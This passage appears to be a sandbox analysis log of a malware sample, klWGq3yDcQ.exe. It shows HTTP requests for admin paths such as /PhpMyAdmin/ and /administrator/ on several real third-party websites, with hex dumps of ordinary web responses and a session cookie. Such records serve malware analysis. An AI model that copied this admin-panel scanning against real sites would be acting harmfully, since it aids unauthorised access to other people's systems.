                                                                                                                                                                                                    2023-11-26 05:59:43 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    358192.168.2.464308116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    359192.168.2.465151144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC181OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1483INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 47 45 54 2c 50 4f 53 54 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 20 41
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Access-Control-Allow-Methods: GET,POSTAccess-Control-Allow-Headers: Content-Type, A
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC6709INData Raw: 33 65 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 72 75 70 6f 72 65 67 69 6f 73 61 66 65 74 79 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45
                                                                                                                                                                                                    Data Ascii: 3e7e<!DOCTYPE html><html lang="es-MX"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://gruporegiosafety.com/xmlrpc.php" /><script type="text/javascript">document.documentE
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC1295INData Raw: 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72
                                                                                                                                                                                                    Data Ascii: global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--pr
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8000INData Raw: 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38 2c 34 34 2c 31 33 30 29 20 36 30 25 2c 72 67 62 28 32 35 31 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d
                                                                                                                                                                                                    Data Ascii: 234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8192INData Raw: 31 66 34 30 0d 0a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 6f 63 65 61 6e 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73
                                                                                                                                                                                                    Data Ascii: 1f40 var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-gras
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7822INData Raw: 20 32 33 70 78 20 31 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 23 6c 65 66 74 2d 61 72 65 61 20 6f 6c 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 62 6f 64 79 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 66 6f 6f 74 65 72 20 6f 6c 2c 2e 65 74 2d 6c 2d 2d 68 65 61 64 65 72 20 6f 6c 7b 6c 69 73 74 2d 73 74 79 6c 65 2d 74 79 70 65 3a 64 65 63 69 6d 61 6c 3b 6c 69 73 74 2d 73 74 79 6c 65 2d 70 6f 73 69 74 69 6f 6e 3a 69 6e 73 69 64 65 3b 70 61 64 64 69 6e 67 3a 30 20 30 20 32 33 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 36 70 78 7d 23 6c 65 66 74 2d 61 72 65 61 20 75 6c 20 6c 69 20 75 6c 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 75 6c 20 6c 69 20 6f 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 30 20 32 70 78 20
                                                                                                                                                                                                    Data Ascii: 23px 1em;line-height:26px}#left-area ol,.entry-content ol,.et-l--body ol,.et-l--footer ol,.et-l--header ol{list-style-type:decimal;list-style-position:inside;padding:0 0 23px;line-height:26px}#left-area ul li ul,.entry-content ul li ol{padding:2px 0 2px
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC8192INData Raw: 31 66 34 30 0d 0a 72 6f 70 65 72 74 79 3a 61 6c 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 2c 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 5f 69 6e 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 2c 2e 65 74 5f 70 62 5f 6d 6f 64 75 6c 65 20 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 3a 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 70 61 64 64 69 6e 67 3a 2e 33 65 6d 20 32 65 6d 20 2e 33 65 6d 20 2e 37 65 6d 7d 2e 65 74 5f 70 62 5f 62 75 74 74 6f 6e 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 32 29 7d 2e 65 74 5f 70 62 5f 62 67
                                                                                                                                                                                                    Data Ascii: 1f40roperty:all!important}.et_pb_button,.et_pb_button_inner{position:relative}.et_pb_button:hover,.et_pb_module .et_pb_button:hover{border:2px solid transparent;padding:.3em 2em .3em .7em}.et_pb_button:hover{background-color:hsla(0,0%,100%,.2)}.et_pb_bg
                                                                                                                                                                                                    2023-11-26 05:59:45 UTC7822INData Raw: 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 54 6f 70 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 25 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 25 29 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 30 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 7b 30 25 7b 6f 70 61 63 69 74 79 3a 30 7d 74 6f 7b 6f 70 61 63 69 74 79 3a 31 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 49 6e 7b 30 25 7b
                                                                                                                                                                                                    Data Ascii: m:translateX(0)}}@keyframes fadeTop{0%{opacity:0;-webkit-transform:translateY(-10%);transform:translateY(-10%)}to{opacity:1;-webkit-transform:translateX(0);transform:translateX(0)}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    360192.168.2.464895199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC189OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1123INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 75 62 6c 69 73 68 65 64 73 69 74 65 2d 78 73 72 66
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCache-Control: no-cache, privateDate: Sun, 26 Nov 2023 05:59:42 GMTSet-Cookie: publishedsite-xsrf
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC607INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 75 62 6c 69 73 68 65 64 53 69 74 65 53 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 52 32 4e 6c 56 47 59 54 4e 36 5a 31 4e 32 61 31 5a 71 4c 33 5a 59 62 55 68 55 57 56 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 63 54 49 32 54 32 67 77 52 47 70 54 5a 31 6c 49 61 6a 6c 4c 4d 57 6f 72 65 46 42 6a 55 6d 70 44 54 48 68 6f 52 32 45 77 5a 55 78 6a 5a 6d 67 78 4f 57 56 51 4e 32 74 34 56 45 6c 79 4e 6d 6c 50 59 31 6c 50 64 69 74 36 63 31 4e 4f 4b 7a 42 72 52 6b 78 46 51 31 64 52 64 6e 46 57 4f 43 74 7a 56 48 56 50 4d 6c 55 78 55 6b 6f 34 62 58 52 77 53 31 6c 51 4c 30 78 46 63 46 42 7a 64 55 4a 75 54 6a 42 57 65 56 46 75 53 57 56 79 5a 47 31 56 51 33 6f 32 4d 32 6c 53 53 6e 70 42 52 53 74 78 55 33 4a 4a 62 6a
                                                                                                                                                                                                    Data Ascii: Set-Cookie: PublishedSiteSession=eyJpdiI6ImR2NlVGYTN6Z1N2a1ZqL3ZYbUhUWVE9PSIsInZhbHVlIjoicTI2T2gwRGpTZ1lIajlLMWoreFBjUmpDTHhoR2EwZUxjZmgxOWVQN2t4VElyNmlPY1lPdit6c1NOKzBrRkxFQ1dRdnFWOCtzVHVPMlUxUko4bXRwS1lQL0xFcFBzdUJuTjBWeVFuSWVyZG1VQ3o2M2lSSnpBRStxU3JJbj
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1580INData Raw: 36 32 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 52 6f 62 6f 74 6f 2c 20 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 20 41 72 69 61 6c 2c 20 73 61
                                                                                                                                                                                                    Data Ascii: 620<!doctype html><html><head> <title>404 - Page Not Found</title> <style type="text/css"> html, body { height: 100%; margin: 0; padding: 0; font-family: Roboto, Helvetica Neue, Arial, sa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    361192.168.2.46512215.235.14.141443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC166OUTGET /admin HTTP/1.1
                                                                                                                                                                                                    Host: unaj.edu.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC473INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 58 2d 44 72 75 70 61 6c 2d 44 79 6e 61 6d 69 63 2d 43 61 63 68 65 3a 20 48 49 54 0d 0a 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: must-revalidate, no-cache, privateX-Drupal-Dynamic-Cache: HITX-UA-Compati
